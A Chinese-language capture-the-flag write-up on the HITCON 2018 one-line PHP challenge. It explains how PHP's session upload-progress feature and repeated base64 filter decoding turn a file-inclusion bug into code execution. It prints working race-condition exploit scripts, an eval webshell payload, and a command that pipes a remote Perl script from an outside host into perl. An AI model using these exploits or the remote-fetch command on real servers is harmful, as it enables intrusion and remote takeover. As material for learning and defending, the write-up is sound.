0%

hitcon 2018受虐笔记一:one-line-php-challenge 学习

都是老知识,但是我依然不会做。。。。蓝瘦

0x1 历史回顾

任意文件包含漏洞,如果session.upload_progress.enabled=On开启,就可以包含session来getshell。这种思路在CTF中已经被利用了N多次了。在这里再回顾一下,加深一下印象。

参考Session 上传进度的文档http://php.net/manual/zh/session.upload-progress.php

http://pic.wonderkun.cc/uploads/2018/10/1.png

手册上有一个例子,如下:

一个上传进度数组的结构的例子

1
2
3
4
5
6
<form action="upload.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="<?php echo ini_get("session.upload_progress.name"); ?>" value="123" />
<input type="file" name="file1" />
<input type="file" name="file2" />
<input type="submit" />
</form>

在session中存放的数据看上去是这样子的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php
$_SESSION["upload_progress_123"] = array(
"start_time" => 1234567890, // The request time
"content_length" => 57343257, // POST content length
"bytes_processed" => 453489, // Amount of bytes received and processed
"done" => false, // true when the POST handler has finished, successfully or not
"files" => array(
0 => array(
"field_name" => "file1", // Name of the <input/> field
// The following 3 elements equals those in $_FILES
"name" => "foo.avi",
"tmp_name" => "/tmp/phpxxxxxx",
"error" => 0,
"done" => true, // True when the POST handler has finished handling this file
"start_time" => 1234567890, // When this file has started to be processed
"bytes_processed" => 57343250, // Amount of bytes received and processed for this file
),
// An other file, not finished uploading, in the same request
1 => array(
"field_name" => "file2",
"name" => "bar.avi",
"tmp_name" => NULL,
"error" => 0,
"done" => false,
"start_time" => 1234567899,
"bytes_processed" => 54554,
),
)
);

session中存储上传进度的键值是:

1
ini_get('session.upload_progress.prefix').$_POST[ini_get['session.upload_progress.name']];

其中$_POST[ini_get['session.upload_progress.name']];是一个我们可控的值,如果把它控制成一个shell的内容,然后包含session就可以getshell了。

1
<input type="hidden" name="<?php echo ini_get("session.upload_progress.name"); ?>" value="<?php eval($_GET[1]); ?>" />

如果session.upload_progress.cleanup=On开启:

Cleanup the progress information as soon as all POST data has been read (i.e. upload completed). Defaults to 1, enabled.

如果POST一被读取,session的内容就会被清空,所以为了在清空之前能包含到有我们payload的session,还需要用条件竞争。

记得当时在@wupco在SCTF2018的题目的非预期解,https://www.cnblogs.com/iamstudy/articles/sctf2018_simple_php_web_writeup.html

我当时以为session.upload_progress.enabled=On仅仅是个意外,是@l3m0n题目环境的问题,当时今天我才发现,php默认就是开启的…..参考手册:

http://php.net/manual/zh/session.configuration.php#ini.session.upload-progress.name

http://pic.wonderkun.cc/uploads/2018/10/2.png
默认就开启的这个性质相当棒啊。。。。

最后给一个利用的exp吧:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#!coding:utf-8

import requests
import time
import threading


host = 'http://your-ip:8088/'
PHPSESSID = 'vrhtvjd4j1sd88onr92fm9t2gt'

def creatSession():
while True:
files = {
"upload" : ("tmp.jpg", open("/etc/passwd", "rb"))
}
data = {"PHP_SESSION_UPLOAD_PROGRESS" : "<?php echo md5('1');?>" }
headers = {'Cookie':'PHPSESSID=' + PHPSESSID}
r = requests.post(host,files = files,headers = headers,data=data)

fileName = "/var/lib/php/sessions/sess_"+PHPSESSID

if __name__ == '__main__':

url = "{}/index.php?file={}".format(host,fileName)
headers = {'Cookie':'PHPSESSID=' + PHPSESSID}
t = threading.Thread(target=creatSession,args=())
t.setDaemon(True)
t.start()
while True:
res = requests.get(url,headers=headers)
if "c4ca4238a0b923820dcc509a6f75849b" in res.content:
print("[*] Get shell success.")
break
else:
print("[-] retry.")

0x2 hitcon2018 one-line-php-challenge

题目代码如下:

1
($_=@$_GET['orange']) && @substr(file($_)[0],0,6) === '@<?php' ? include($_) : highlight_file(__FILE__);

题目描述:P.S. This is a default installation PHP7.2 + Apache on Ubuntu 18.04

php的session.upload_progress.enabled=On引起的一个小问题

由于这个题目连session都没开,所以我根本就没有考虑去包含session。

但是最后看了orange的exp我才发现,只要发的POST请求中只要包含ini_get("session.upload_progress.name")这个键值,并带上session_id,同时进行文件上传,就会直接创建一个session文件。

测试如下,先删除session文件:

1
2
3
root@e5dfc152ed97:/var/lib/php/sessions# pwd
/var/lib/php/sessions
root@e5dfc152ed97:/var/lib/php/sessions# rm -rf *

然后发起请求:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
POST /?file=test HTTP/1.1
Host: 127.0.0.1:8088
Connection: close
Accept: */*
User-Agent: python-requests/2.18.4
Cookie: PHPSESSID=u0hgfruaudns3jigq5trocbr0m
Content-Length: 290
Content-Type: multipart/form-data; boundary=--------713660820

----------713660820
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

test
----------713660820
Content-Disposition: form-data; name="upload";filename='test'

test
----------713660820
Content-Disposition: form-data; name="submit"

submit
----------713660820--

在服务器端成功的创建了session文件:

1
2
root@e5dfc152ed97:/var/lib/php/sessions# ls
sess_u0hgfruaudns3jigq5trocbr0m

emmmmm , php是最好的语言。。。。

利用php base64_decode 的容错,去掉upload_progress_

session文件的内容如下:

1
2
3
4
root@e5dfc152ed97:/var/lib/php/sessions# for i in `seq 1 300`; do cat sess_u0hgfruaudns3jigq5trocbr0m ; done
upload_progress_@<?php eval($_GET[1]);|a:5:{s:10:"start_time";i:1540269279;s:14:"content_length";i:315;s:15:"bytes_processed";i:
315;s:4:"done";b:0;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:6:"upload";s:4:"name";s:4:"test";s:8:"tmp_name";N;s:5:"error";i
:0;s:4:"done";b:0;s:10:"start_time";i:1540269279;s:15:"bytes_processed";i:315;}}}

需要绕过下面这个限制,多了额外的字符upload_progress_

1
@substr(file($_)[0],0,6) === '@<?php'

这里可以利用多次base64解码来去除upload_progress_

因为base64解码函数可以接受的字符范围是[A-Za-z0-9+/=],但是如果php的base64_decode遇到了不在此范围内的字符,php就会直接跳过这些字符,只把在此范围的字符连起来进行解码。@phith0n师父早就说过这个问题,而我在做题的时候还是妥妥的忘掉了。。

我们来做个试验:

1
2
3
4
5
6
7
8
9
10
11
12
$i = 0 ;
$data = "upload_progress_ZZ";
while(true){
$i += 1;
$data = base64_decode($data);
var_dump($data);
sleep(1);
if($data == ''){
echo "一共解码了:".$i,"次\n";
break;
}
}

运行结果如下:

1
2
3
4
5
string(12) "��hi�k�
޲�Y"
string(3) "�)"
string(0) ""
一共解码了:3

upload_progress_ZZ一共是18个字符,但是由于base64_decode跳过了_,所以是剩下16个字符,解码一次之后是12个字符,又因为12个字符中只有4个在范围内,所以再次解码之后变为了3个字符,这三个字符都不在范围内,所以解码之后为空字符串。

这里需要注意的是我们在upload_progress_前缀后面扩展了两位是ZZ,这个ZZ的选择也是非常有讲究的,必须保证每一次的的base64解码之后的可接受字符个数都必须是4的整数倍,否则就会吞掉后面的payload。

举个例子upload_progress_AA就是不满足条件的,因为一次base64解码之后变为了

1
2
string(12) "��hi�k�
޲�"

可接受字符变为了3个,不是4的倍数,那么在下一次进行base64解码的时候,一定会吞掉后面的一位,导致payload部分被破坏掉。

所以最后控制SESSION的key值为:

1
"upload_progress_ZZ".base64_encode(base64_encode(base64_encode('@<?php eval($_GET[1]);')));

然后进行三次的base_64decode,就会去掉upload_progress_,只剩下@<?php eval($_GET[1]);

最后附上orange的exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
import sys
import string
import requests
from base64 import b64encode
from random import sample, randint
from multiprocessing.dummy import Pool as ThreadPool



HOST = 'http://54.250.246.238/'
sess_name = 'iamorange'

headers = {
'Connection': 'close',
'Cookie': 'PHPSESSID=' + sess_name
}

payload = '@<?php `curl orange.tw/w/bc.pl|perl -`;?>'


while 1:
junk = ''.join(sample(string.ascii_letters, randint(8, 16)))
x = b64encode(payload + junk)
xx = b64encode(b64encode(payload + junk))
xxx = b64encode(b64encode(b64encode(payload + junk)))
if '=' not in x and '=' not in xx and '=' not in xxx:
print xxx
break

def runner1(i):
data = {
'PHP_SESSION_UPLOAD_PROGRESS': 'ZZ' + xxx + 'Z'
}
while 1:
fp = open('/etc/passwd', 'rb')
r = requests.post(HOST, files={'f': fp}, data=data, headers=headers)
fp.close()

def runner2(i):
filename = '/var/lib/php/sessions/sess_' + sess_name
filename = 'php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s' % filename
# print filename
while 1:
url = '%s?orange=%s' % (HOST, filename)
r = requests.get(url, headers=headers)
c = r.content
if c and 'orange' not in c:
print [c]

if sys.argv[1] == '1':
runner = runner1
else:
runner = runner2

pool = ThreadPool(32)
result = pool.map_async( runner, range(32) ).get(0xffff)